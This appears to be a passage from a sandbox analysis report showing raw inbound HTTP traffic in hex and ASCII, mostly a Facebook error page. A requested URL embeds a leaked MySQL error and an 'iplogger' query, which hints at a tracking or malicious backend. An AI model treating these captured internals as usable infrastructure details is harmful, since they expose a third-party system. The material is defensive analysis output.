2022-10-07 13:59:49 UTC	1024	IN	Data Raw: 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 52 65 62 35 33 68 65 22 3e 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 Data Ascii: on b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="GReb53he"></style><script nonce="
2022-10-07 13:59:49 UTC	1025	IN	Data Raw: 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 0d 0a 31 39 39 37 0d 0a 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 Data Ascii: f81543d86055886bc028634571997'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><link rel="ma
2022-10-07 13:59:49 UTC	1027	IN	Data Raw: 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 Data Ascii: 22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457&
2022-10-07 13:59:49 UTC	1028	IN	Data Raw: 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 Data Ascii: 4;'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0
2022-10-07 13:59:49 UTC	1029	IN	Data Raw: 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 Data Ascii: Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="stylesheet" hr
2022-10-07 13:59:49 UTC	1031	IN	Data Raw: 74 2d 52 78 55 68 73 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 64 59 49 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 41 77 30 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 6a 30 59 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 65 34 51 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 Data Ascii: t-RxUhs"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8dYI"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6Aw0"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6j0Y"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xe4Q"},"1738486":{"result":false
2022-10-07 13:59:49 UTC	1032	IN	Data Raw: 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 3a Data Ascii: ,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":
2022-10-07 13:59:49 UTC	1034	IN	Data Raw: 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c Data Ascii: rsion":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":null,
2022-10-07 13:59:49 UTC	1035	IN	Data Raw: 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 Data Ascii: RT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDAT
2022-10-07 13:59:49 UTC	1037	IN	Data Raw: 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 Data Ascii: sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","b
2022-10-07 13:59:49 UTC	1038	IN	Data Raw: 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c Data Ascii: ","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[],
2022-10-07 13:59:49 UTC	1040	IN	Data Raw: 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e Data Ascii: /":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/con
2022-10-07 13:59:49 UTC	1041	IN	Data Raw: 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 Data Ascii: /buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"
2022-10-07 13:59:49 UTC	1043	IN	Data Raw: 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 30 30 Data Ascii: "app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":6000
2022-10-07 13:59:49 UTC	1044	IN	Data Raw: 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 32 68 44 69 69 75 67 48 5a 6e 6d 31 47 6b 33 48 38 4f 64 4b 44 7a 64 5a 77 4e 2d 5a 50 73 52 6c 31 72 36 53 52 6a 4d 77 36 58 30 32 37 30 54 38 74 39 41 43 46 69 51 72 54 65 4c 30 30 70 7a 49 45 4f 2d 72 58 69 2d 48 4c 70 72 32 6f 4f 71 6f 73 75 39 4f 65 5f 76 47 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 32 68 44 69 69 75 67 48 5a 6e 6d 31 47 6b 33 48 38 4f 64 4b 44 7a 64 5a 77 4e 2d 5a 50 73 52 6c 31 72 36 53 52 6a 4d 77 36 58 30 32 37 30 54 38 74 39 41 43 46 69 51 72 54 65 4c 30 30 70 7a 49 45 Data Ascii: learIntervalBlue","Aa2hDiiugHZnm1Gk3H8OdKDzdZwN-ZPsRl1r6SRjMw6X0270T8t9ACFiQrTeL00pzIEO-rXi-HLpr2oOqosu9Oe_vGY"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa2hDiiugHZnm1Gk3H8OdKDzdZwN-ZPsRl1r6SRjMw6X0270T8t9ACFiQrTeL00pzIE
2022-10-07 13:59:49 UTC	1046	IN	Data Raw: 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 76 70 31 75 64 70 65 69 78 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 4a 7a 2d 36 75 43 43 69 63 75 70 4f 4e 44 33 77 36 6d 53 6c 45 68 6c 52 30 70 2d 5f 4a 77 75 77 6a 4b 7a 56 58 49 46 4e 66 56 2d 76 64 50 79 Data Ascii: fig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyvp1udpeix","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa3Jz-6uCCicupOND3w6mSlEhlR0p-_JwuwjKzVXIFNfV-vdPy
2022-10-07 13:59:49 UTC	1047	IN	Data Raw: 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 4c 77 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 20 63 Data Ascii: le="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_Lw"><span style="color: white">Join or Log Into Facebook <i c
2022-10-07 13:59:49 UTC	1048	IN	Data Raw: 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 43 79 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 76 70 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 39 34 39 5f 41 50 34 32 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 Data Ascii: off" name="timezone" value="" id="u_0_3_Cy" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_vp" /><input type="hidden" name="lgnrnd" value="065949_AP42" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hid
2022-10-07 13:59:49 UTC	1050	IN	Data Raw: 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 6d 20 Data Ascii: "main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fsm
